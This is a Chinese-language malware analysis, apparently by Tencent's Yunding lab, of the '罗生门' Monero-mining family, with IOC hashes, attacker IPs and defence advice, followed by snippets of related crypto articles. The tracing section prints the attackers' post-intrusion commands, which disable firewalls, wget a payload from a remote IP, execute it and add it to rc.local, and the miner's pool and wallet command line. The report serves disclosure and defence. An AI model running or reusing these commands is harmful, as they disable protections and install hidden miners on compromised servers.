币圈惊现门罗币挖矿新家族「罗生门」

欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~

本文由云鼎实验室发表于云+社区专栏

一、前言

腾讯安全云鼎实验室通过部署的威胁感知系统捕获了一批挖矿样本(具有同源性),是一批可挖取门罗币(xmr)的挖矿病毒。这批样本今年5月开始出现,目前各大杀软对此样本基本无法有效查杀,腾讯云云镜第一时间跟进查杀。根据进一步溯源的信息可以推测该挖矿团伙利用被***的×××服务器进行病毒传播。分析显示,此挖矿样本不具有传播性,总体结构式是 Loader + 挖矿子体,挖矿团伙通过控制的机器进行远程 SSH 暴力破解并将病毒进行传播。由于目前能对付此病毒的杀软极少,且该病毒通过***的×××服务器进行病毒传播、挖矿,让真相扑朔迷离,云鼎实验室威胁情报小组将本次门罗币挖矿新家族命名为「罗生门」。

二、病毒母体分析

挖矿样本通过母体释放挖矿子体,母体是 Loader ,释放挖矿子体,执行挖矿子体。母体本身不包含 SSH 爆破等蠕虫动作,子体就是单纯的挖矿代码(加壳变形 UPX)。通过观测发现,进行 SSH 爆破的主机 IP 较少且固定,可以认定为固定机器,使用工具进行扫描、爆破。通过这种广撒网的方式,犯罪团伙能收获不少门罗币。

***流程图:

***过程示意:

***日志来源:http://bikewiki.jp:5000/app/2018/07/27/073148-4879.log

母体 Loader 详细分析:

母体 Loader 的行为包含自启动和释放运行文件两个部分。

自启动代码:

在函数 main_Boot 中通过 sed 编辑 rc.local 和 boot.local 来进行自启动。

释放文件:

执行文件:

三、病毒子体分析

通过对挖矿样本进行分析发现,子体是一个加壳后的标准矿机程序,子体加壳也是导致杀软无法查杀的一个方式。子体加壳为 UPX 变形壳,可以抵抗通用脱壳机的脱壳。手动脱壳后发现为标准挖矿程序(开源矿机程序)。

相关开源项目连接为:https://github.com/sumoprojects/cryptonote-sumokoin-pool

四、矿池分析与统计

据观测今年5月至9月初,蜜罐捕获的「罗生门」挖矿病毒累计挖出约12.16个门罗币,价值约1w人民币(2018年10月8日,门罗币价格为114.2 USD,合计1388.67美金),算力为8557H/S,大约是皮皮虾矿池的百分之一算力。从算力上看,这种广撒网式的传播,也能有一定的规模。

挖矿样本执行挖矿的命令如下:

-B -o stratum+tcp://mine.ppxxmr.com:7777 -u 41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCM‘Qf1FwzqEi-p x -k --max-cpu-usage=75

从挖矿命令中可知,挖矿样本对 CPU 利用率有一定的限制,最大 CPU 使用量为75%。

挖矿样本针对的矿池地址和门罗币(xmr)产量如下:

对应的钱包地址为:

钱包地址:

45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT

45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT

45vKgdPY4M3Lp4RXWccWCBFP7HCtcp718GyGaNVmi58j9rdDX716yz5MKXT2EDjFixgPW8mjnaXvz2cBUpEqVCLKFH1z9Tx

45vKgdPY4M3Lp4RXWccWCBFP7HCtcp718GyGaNVmi58j9rdDX716yz5MKXT2EDjFixgPW8mjnaXvz2cBUpEqVCLKFH1z9Tx

41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCMQf1FwzqEi

45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT

45KGejq1HDHXB618E3aeWHFyoLh1kM5syRG8FHDiQ4pZXZF1pieqW7DM5HHe3Y2oc1YwoEc7ofjgtbeEqV3UrkS9SVygJPT

47xB4pdBngkhgTD1MdF9sidCa6QRXb4gv6qcGkV1TT4XD6LfZPo12CxeX8LCrqpVZm2eN3uAZ1zMQCcPnhWbLoPgNbK8y3Z

41tPS2hg6nc6DWNXDiWG7ngGSnLAaw4zmBeM478r1tkZDGH1y8aFPDiDqAFN8LouyAXTxtrLVigmRgLXytezCMQf1FwzqEi

五、免杀分析

1、检测效果:

将挖矿样本在 VirusTotal 中检测发现,除了 Drweb 可以检出此样本,其余杀软均无法有效检测此样本。挖矿病毒5月出现,流行3月有余,VirusTotal 上依然只有1款杀软可以查杀。

下图是挖矿样本在 VirusTotal 中的检测结果:

2、免杀流程:

基本所有杀软都无法查杀此病毒,此病毒通过 Go 语言 Loader 和子体加变形 UPX 壳进行免杀,对于 Linux 查杀较为薄弱的杀软,很容易漏报。

免杀示意图:

Loader 使用 Go 语言编写,大量的 Go 语言的库代码掩盖了真正的病毒代码部分,所以免杀效果较好。2155个 Go 语言库函数,真正的病毒代码包含在4个函数中。

六、溯源分析

对这批挖矿样本进行溯源分析发现,从今年5月开始,发起***的 IP一共有两个:160.124.67.66、123.249.34.103

另外,样本下载地址:181.215.242.240、123.249.9.141、123.249.34.103、58.221.72.157、160.124.48.150

SSH 暴力破解成功后执行的命令有(suSEfirewall 的关闭、iptables 的关闭、样本的下载):

/etc/init.d/iptables stop;

service iptables stop;

SuSEfirewall2 stop;

reSuSEfirewall2 stop;cd /tmp;

wget -c http://181.215.242.240/armtyu;

chmod 777 armtyu;./armtyu;

echo "cd /tmp/">>/etc/rc.local;

echo "./armtyu&">>/etc/rc.local;echo "/etc/init.d/iptables stop

扫描 IP 和下载 IP 信息表:

IP 地址 服务器地址 对外开放服务 其他描述
181.215.242.240 美国 netbios ftp、垃圾邮件、僵尸网络
160.124.67.66 中国 香港 netbios mmhongcan168.com、28zuche.com、014o.com、ip28.net、扫描
160.124.48.150 中国 香港 netbios ip28.net、扫描
123.249.9.141 中国 贵州 僵尸网络

表格中 160.124.67.66 是扫描 IP,通过对 IP 信息的图谱聚类,发现香港的两台主机均为一个团伙控制的机器。 美国和贵州的机器是***得到的机器。

(团伙图聚类)

上面提到的扫描机器均为×××的机器,曾经的域名 mmhongcan168、28zuche 等都是×××。

28zuche:

另一台香港机器的域名为 himitate.com,也是×××。

两台香港主机均为 ip28.net,都可以作为门罗币(xmr)的挖矿代理主机。

黑产江湖之黑吃黑:

有人的地方就有江湖,黑产作为互联网中的法外之地,弱肉强食也是这个不法之地的规则。有做大产业的黑产大佬,也有干一票就走的小团伙,黑吃黑几乎天天都在上演。

×××和×××网站是黑吃黑中常常被吃的对象,经研究分析可知,众多×××所在的服务器竟被用来做扫描,各×××之间并没发现强关联性,做×××的团伙同时做挖矿的跨界运营也不是很多,而且整个挖矿金额不高。挖矿团伙若是***了×××,利用其作为病毒服务器传播挖矿病毒,这也不是不可能。

对于美国和贵州的两台下载机,根据 threatbook 的情报,这两台主机应该是肉鸡,如下图:

第二个扫描地址为:123.249.34.103

58.221.72.157 江苏 rat
123.249.34.103 贵州 scan
mdb7.cn 美国 bot

地理位置:

扫描地址 123.249.34.103的实际地址为中国贵州黔西南布依族苗族自治州,相关的情报如下:

相关网站解析过的地址为:

f6ae.com

www.f6ae.com

www.h88049.com

www.h88034.com

h88032.com

www.h88032.com

h88034.com

h88049.com

h5770.com

h88051.com

以上 URL 地址均为×××:

其他的一些情报

云鼎实验室威胁情报团队在网络上也观测到这些 IP 的扫描行为,很多日志都有记录。可以发现这个挖矿样本的扫描传播是一种无针对的、广撒网式的暴力破解传播模式。

日志地址1:

ftp://egkw.com/Program%20Files/Apache%20Software%20Foundation/Tomcat%207.0/logs/localhost_access_log.2018-04-28.txt

日志地址2:

http://217.31.192.50/data/proki2018-05-13.txt

七、总结

通过观测发现扫描主机均属于×××,×××等黑产现在开始向挖矿业务进军了吗?

防御方法:

(1)修改 SSH 口令,要定期更换 SSH 口令,并保证一定的复杂度。

(2)安装腾讯云云镜,提前发现可疑***及暴力破解行为。

(3)对于外部 SSH 连接的 IP 进行黑白名单限制。

相关样本hash:

48f82a24cf1e99c65100c2761f65265c

723bd57431aa759d68cecb83fc8a7df8

a357b1b00e62cab7dc8953522f956009

470e7cdac0360ac93250f70a892a8d03

788eaec718569c69b21ff3daef723a8f

bf34509ae03b6f874f6f0bf332251470

580cb306c4e4b25723696cb0a3873db4

826f3e5ee3addfbf6feadfe5deadbe5e

dd68a5a3bf9fbb099c9c29e73dbab782

相关中间文件sha256:

8797e998c01d2d6bb119beb2bbae3c2f84b6ae70c55edd108ed0e340972cf642

f8e1957e8bfd7f281a76d1e42694049c67f39dea90ac36e9d589c14cdf8924bc

f54b1e99039037f424e7e2ada7ae0740b6d1da229688a81e95fd6159f16fbbc1

ca60d04204aa3195e8cd72887c7deced1a7c664e538256f138b5698d381ceb00

e8b70f11c412a75ccfb48771029679db72c27bd61c41c72e65be5464415df95f

08fd38e2891942dadd936d71b7e98055ba48c58bc986d5c58f961055bcc378fc

08a31726ae65f630ce83b9a0a44108ff591809b14db5b7c0d0be2d0829211af5

1ac7ba4ba4b4a8c57b16cf4fac6ea29e41c0361c3260bf527278525b4bec5601

396a2174d2f09e8571e0f513a8082ccdd824e988b83393217274e64fe0dafd69

b238c09c3fdbda62df39039ed49d60d42d32312eedadfc2c6ced4d65d27b1ddb

99802523c466ea9273de893be5c12c7c654dfd4deb5a896b55718e69b721e548

786f4d124ef75e9f45d650fbd859d591a03ca71e2625f50d3078503f76edfd34

1dfb2cd3c94c624691534446ece255c49ed3ba02f45128c19e5a853dcf6f6ab8

472ba9ddbef409975284e4428071d5b8eb576f2b27ad19ca2fad7094aeebd281

1fa25061004ea01311b2d27feda124b4262b5611f91882c2d9895f0a53016051

58ad0006fe9fd093c7af6f0065a93209f21074d6694f0351f25ece1b78b7a978

fbb1396e37adcab88a0e21f9e0366c8da9a199652906fa194caccef8f70844c3

f8ccdcc45c6cbd4cc1c8f56a320106cfc9c42ad94b499d5ca6ec280b1077bf41

ffb9568a7b5da78389d20daba65e2e693e8c9828c874ad8771dcd5bb5c8a1e57

f5aed11216ee356a4896ad22f375e2b62b7ca22e83737f24ec0e5cdaa400b051

腾讯安全云鼎实验室

关注云主机与云内流量的安全研究和安全运营。利用机器学习与大数据技术实时监控并分析各类风险信息,帮助客户抵御高级可持续***;联合腾讯所有安全实验室进行安全漏洞的研究,确保云计算平台整体的安全性。相关能力通过腾讯云开放出来,为用户提供******检测和漏洞风险预警等服务,帮助企业解决服务器安全问题。

问答
游戏体系结构
相关阅读
团战开黑必备“良药”了解一下!
再也不用担心网吧开黑队友听不清了!
3行代码,为QQ轻游戏加上语音互动能力
【每日课程推荐】机器学习实战!快速入门在线广告业务及CTR相应知识

此文已由作者授权腾讯云+社区发布,更多原文请点击

搜索关注公众号「云加社区」,第一时间获取技术干货,关注后回复1024 送你一份技术课程大礼包!

海量技术实践经验,尽在云加社区

原文地址:http://blog.51cto.com/13957478/2298592

时间: 2024-10-22 12:04:14

币圈惊现门罗币挖矿新家族「罗生门」的相关文章

区块链开发 币圈专业术语大全

币圈怎么赚钱啊?币圈怎么搬砖啊?币圈破发是什么意思?对于新入币圈的小伙伴经常会问一些这样的问题?下面就给大家带来了币圈专业术语大全,希望对新进币圈的小伙伴有所帮助.币圈是什么意思?所谓的币圈,即数字货币玩家天然形成的圈子.币圈不大,但是人数也不算少,而且在人群中基本上属于小众异类,但林林总总算是一个圈子,赚钱的人不多,形形×××的赚钱方式也都被迅速地拷贝过来,1CO.炒币.挖矿等. 币圈怎么样赚钱?币圈赚钱的方式有很多,最主要的炒币.1CO众筹.搬砖等. 币圈的法币是什么意思?法币是法定货币,是

为什么你币圈投资一直亏钱?

众所周知的是,币圈有很多空气币,包括比特币以太坊,其实都是空气币.何为空气?就是那种全凭价格数字变化来吸引人,而并非和业绩进行联动的. 有人说币圈有很多的币也有其他的业务啊,怎么说是空气币呢?比如以太坊也有以太坊网络,它怎么可能是空气币呢?以太坊有ETH币,也有以太坊网络,但是以太坊网络的好坏以及以太坊项目的整体营收和你是没有关系的.你买以太坊只是获得一个数字而并非以太坊项目的价值.这种就是空气. 注意重点:你买的只是一个价格而非价值.价值,是包装给你看的,到你手里的,其实只是一个价格,一个数字

浏览器挖矿——XMR门罗币

挖门罗币 门罗币(Monero,代号XMR)是一个创建于2014年4月开源加密货币,它着重于隐私.分权和可扩展性.截至2017年,Monero是交易量排行第六的加密货币,市值 超过3亿美元. 首先需要一个账号和钱包,可以选本地钱包或在线钱包 本地钱包下载门罗币钱包:https://getmonero.org/downloads/注册一个新账号,注意保存相关信息 在线钱包https://mymonero.com/下一步是下载.运行挖矿程序: xmr-stak是一款集成了CPU.GPU挖矿的工具,由

门罗币_挖矿

相关概念 生成钱包方式: 本地钱包:需要同步大量数据 在线钱包:直接生成 注册在线钱包: https://mymonero.com/ 挖矿的方式: 1:使用官方的的程序直接挖 2:连接到矿池,矿池的原理就是把大家算力集中起来到一个人身上来挖,这样这个玩家计算就很强,挖到Monero的概率就大一些,然后挖到币后,矿池在根据每个玩家的计算来分配 矿池本身并不进行挖矿计算,而是将计算任务分配给连接到矿池的矿机: 矿池: 1.https://xmr.nanopool.org 矿池地址:xmr-us-ea

教你检测门罗币挖矿木马

MS016小组(原创) 前言: 随着比特币的成功,越来越多的山寨币开始模仿. 因为有些人,在比特币刚开始的时候,感觉不靠谱 错失了挣钱的良机. 所以现在很多人后悔了 , 就开始寄托于别的币  , 所以有些人投入机器挖矿. 而黑客呢 掌握技术 也等同于掌握机器!也不是所有机器都能挖矿的 , 当然以黑客的视角去思考问题,一般的黑客都是通过. 这里有张流程图 ,根据爆出来的已知漏洞 而且危害很高的 比如ST – 045 等等 , 而且像苹果系统mac os 也能挖矿  linux挖矿比window挖矿

2019年最简单的门罗币(XMR)挖矿教程

一.钱包注册  待 二.挖矿 KKMiner 官网 :http://www.kkminer.cn KKMiner是一款面向Windows的门罗币免费挖矿工具,简单易用,一目了然的监控界面,支持多币种挖矿,稳定高效,高收益,官网下载后修改钱包地址后点击挖矿即可. (1).KKMiner配置截图 (2).运行截图 3.查看收益 待 三.如何交易门罗币 Gagte (原比特儿)   https://gateio.co 交易前需在Gate 交易平台上注册一个账号,当然注册完账号后需要认证,认证完之后才可

挖矿-门罗币

注册门罗币钱包 https://wallet.mymonero.com 一定要记好MNEMONIC,否则登不上钱包. 注册矿池的账号 https://www.f2pool.com/ 注册账号,找到对应币的挖矿软件 也要查看矿池地址 挖矿软件 登录服务器,下载挖矿软件 wget --no-check-certificate https://github.com/fireice-uk/xmr-stak/releases/download/1.0.3-rx/xmr-stak-rx-linux-1.0.

你不知道的币圈江湖,ETH(以太坊)VS比特币,V神看不上中本聪

我们知道,ETH(以太坊)和比特币是目前最受币圈用户青睐的两种数字货币.但你或许不知道,他们背后的创始人,V神和中本聪并没有多少交集,甚至从某些方面来说,V神是看不上中本聪的,虽然他是比特币的创造者. 一.密码朋克,比特币先驱 非对称加密.点对点技术.哈希现金是比特币的三项关键技术. 比特币的加密理论基础来源于以下几项密码学的技术创新 :1976年威持菲尔德?迪菲 (WhitfieicJ Diffie)与马蒂?赫尔曼 (Marty Heilman)发明的非对称加密算法, 977年罗纳德?李维斯特

为什么火热的币圈也爱热衷打美女牌?

就在近日,一个新闻刷爆了朋友圈和微博--<新骗局!广州抓了80多个帮外公卖茶叶骗钱的"美女">.虽然对于"卖茶美女"的骗局早有耳闻,不过一下子端掉这么大的诈骗团伙,还是很罕见的.而此次破案也再次证实了一个猜测--与你聊天的萌妹子,可能真身就是一个"抠脚大汉". 很多人之所以上当受骗,就在于被那些美女的头像.精心设计的销售套路所蒙蔽,丧失了理智的判断.试想一下,如果对方头像是满脸络腮胡子的大汉.不修边幅的"肥宅",想